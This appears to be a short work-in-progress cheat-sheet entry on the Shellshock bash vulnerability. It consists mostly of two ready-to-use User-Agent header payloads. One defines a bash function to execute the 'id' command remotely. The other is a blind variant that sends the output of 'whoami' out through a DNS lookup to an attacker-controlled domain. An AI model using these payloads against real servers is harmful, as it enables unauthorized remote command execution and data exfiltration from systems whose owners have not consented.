CVE - Shellshock (WIP)
# We could craft a payload to generate an RCE in a bash
User-Agent: u() { :; }; echo; echo; /bin/bash -c 'id'
# If successful, the command will be executed. Sometimes we will see the result in the response, but in other cases we have to adopt blind techniques
# We could use this to play with a domain we control
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).<OurDomain>Last updated